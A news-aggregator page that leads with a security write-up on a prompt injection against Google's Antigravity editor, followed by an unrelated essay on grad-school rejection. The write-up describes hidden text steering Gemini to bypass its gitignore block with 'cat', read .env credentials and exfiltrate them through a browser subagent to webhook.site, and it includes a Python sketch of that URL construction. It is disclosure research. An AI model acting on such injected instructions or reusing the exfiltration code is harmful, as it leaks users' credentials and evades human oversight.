An indirect prompt injection in an implementation blog can manipulate Antigravity to invoke a malicious browser subagent in order to steal credentials and sensitive code from a user’s IDE.

Antigravity is Google’s new agentic code editor. In this article, we demonstrate how an indirect prompt injection can manipulate Gemini to invoke a malicious browser subagent in order to steal credentials and sensitive code from a user’s IDE.

Google’s approach is to include a disclaimer about the existing risks, which we address later in the article.

Let’s consider a use case in which a user would like to integrate Oracle ERP’s new Payer AI Agents into their application, and is going to use Antigravity to do so.

In this attack chain, we illustrate that a poisoned web source (an integration guide) can manipulate Gemini into (a) collecting sensitive credentials and code from the user’s workspace, and (b) exfiltrating that data by using a browser subagent to browse to a malicious site.

Note: Gemini is not supposed to have access to .env files in this scenario (with the default setting ‘Allow Gitignore Access > Off’). However, we show that Gemini bypasses its own setting to get access and subsequently exfiltrate that data.

The user provides Gemini with a reference implementation guide they found online for integrating Oracle ERP’s new AI Payer Agents feature.

Antigravity opens the referenced site and encounters the attacker’s prompt injection hidden in 1-point font.

a. Collect code snippets and credentials from the user’s codebase.

b. Create a dangerous URL using a domain that allows an attacker to capture network traffic logs, and append credentials and code snippets to the request.

c. Activate a browser subagent to access the malicious URL, thus exfiltrating the data.

Gemini is manipulated by the attacker’s injection to exfiltrate confidential .env variables.

a. Gemini reads the prompt injection: Gemini ingests the prompt injection and is manipulated into believing that it must collect and submit data to a fictitious ‘tool’ to help the user understand the Oracle ERP integration.

b. Gemini gathers data to exfiltrate: Gemini begins to gather context to send to the fictitious tool. It reads the codebase and then attempts to access credentials stored in the .env file as per the attacker’s instructions.

c. Gemini bypasses the .gitignore file access protections: The user has followed a common practice of storing credentials in a .env file, and has the .env file listed in their .gitignore file. With the default configuration for Agent Gitignore Access, Gemini is prevented from reading the credential file.

This doesn’t stop Gemini. Gemini decides to work around this protection using the ‘cat’ terminal command to dump the file contents instead of using its built-in file reading capability that has been blocked.

d. Gemini constructs a URL with the user’s credentials and an attacker-monitored domain: Gemini builds a malicious URL per the prompt injection’s instructions by URL-encoding the credentials and codebase snippets (e.g., replacing characters like spaces that would make a URL invalid), and appending them to a webhook.site domain that is monitored by the attacker (see the sketch after this list).

e. Gemini exfiltrates the data via the browser subagent: Gemini invokes a browser subagent per the prompt injection, instructing the subagent to open the dangerous URL that contains the user’s credentials.

This step requires that the user has set up the browser tools feature. This is one of the flagship features of Antigravity, allowing Gemini to iterate on its designs by opening the application it is building in the browser.

Note: This attack chain showcases manipulation of the new Browser tools, but we found three additional data exfiltration vulnerabilities that did not rely on the Browser tools being enabled.
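
To see why an allowlisted logging domain is all an attacker needs, the sketch below illustrates the URL construction step (d) describes: ordinary percent-encoding is enough to smuggle arbitrary file contents into a syntactically valid query string. The webhook token is a placeholder.

# Illustration of the URL construction described in step (d). The token is a
# placeholder; the point is that plain percent-encoding turns file contents
# into a "valid" URL that a browser subagent can be told to visit.
from urllib.parse import quote

stolen = open(".env").read()                      # credentials the agent dumped via `cat`
url = ("https://webhook.site/<attacker-token>"    # attacker-monitored, allowlisted domain
       + "?data=" + quote(stolen))
# Merely visiting this URL delivers the data: the attacker reads it from
# webhook.site's request log.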

When Gemini creates a subagent instructed to browse to the malicious URL, the user may expect to be protected by the Browser URL Allowlist.

However, the default Allowlist provided with Antigravity includes ‘webhook.site’. Webhook.site allows anyone to create a URL where they can monitor requests to the URL.

So, the subagent completes the task.

When the malicious URL is opened by the browser subagent, the credentials and code stored in the URL are logged to the webhook.site address controlled by the attacker. Now, the attacker can read the credentials and code.

During Antigravity’s onboarding, the user is prompted to accept the default recommended settings shown below.

These are the settings that, amongst other things, control when Gemini requests human approval. During the course of this attack demonstration, we clicked “next”, accepting these default settings.

This configuration allows Gemini to determine when it is necessary to request a human review for Gemini’s plans.

This configuration allows Gemini to determine when it is necessary to request a human review for commands Gemini will execute.

One might note that users operating Antigravity have the option to watch the chat as agents work, and could plausibly identify the malicious activity and stop it.

However, a key aspect of Antigravity is the ‘Agent Manager’ interface. This interface allows users to run multiple agents simultaneously and check in on the different agents at their leisure.

Under this model, it is expected that the majority of agents running at any given time will be running in the background without the user’s direct attention. This makes it highly plausible that an agent is not caught and stopped before it performs a malicious action as a result of encountering a prompt injection.

A lot of AI companies are opting for this disclaimer rather than mitigating the core issues. Here is the warning users are shown when they first open Antigravity:

Given that (1) the Agent Manager is a star feature allowing multiple agents to run at once without active supervision and (2) the recommended human-in-the-loop settings allow the agent to choose when to bring a human in to review commands, we find it extremely implausible that users will review every agent action and abstain from operating on sensitive data. Nevertheless, as Google has indicated that they are already aware of data exfiltration risks exemplified by our research, we did not undertake responsible disclosure.

...

Read the original on www.promptarmor.com »

9 716 shares, 30 trendiness

All it takes is for one to work out

More than a decade ago, when I was applying to graduate school, I went through a period of deep uncertainty. I had tried the previous year and hadn’t gotten in anywhere. I wanted to try again, but I had a lot going against me.

I’d spent most of my undergrad building a student job-portal startup and hadn’t balanced it well with academics. My GPA needed explaining. My GMAT score was just okay. I didn’t come from a big-brand employer. And there was no shortage of people with similar or stronger profiles applying to the same schools.

Even though I had learned a few things from the first round, the second attempt was still difficult. There were multiple points after I submitted applications where I lost hope.

But during that stretch, a friend and colleague kept repeating one line to me:

“All it takes is for one to work out.”

He’d say it every time I spiraled. And as much as it made me smile, a big part of me didn’t fully believe it. Still, it became a little maxim between us. And eventually, he was right — that one did work out. And it changed my life.

I’ve thought about that framing so many times since then.

You don’t need every job to choose you. You just need the one that’s the right fit.

You don’t need every house to accept your offer. You just need the one that feels like home.

You don’t need every person to want to build a life with you. You just need the one.

You don’t need ten universities to say yes. You just need the one that opens the right door.

These processes — college admissions, job searches, home buying, finding a partner — can be emotionally brutal. They can get you down in ways that feel personal. But in those moments, that truth can be grounding.

All it takes is for one to work out.

And that one is all you need.

...

Read the original on alearningaday.blog »

10 713 shares, 29 trendiness

Boing

...

Read the original on boing.greg.technology »
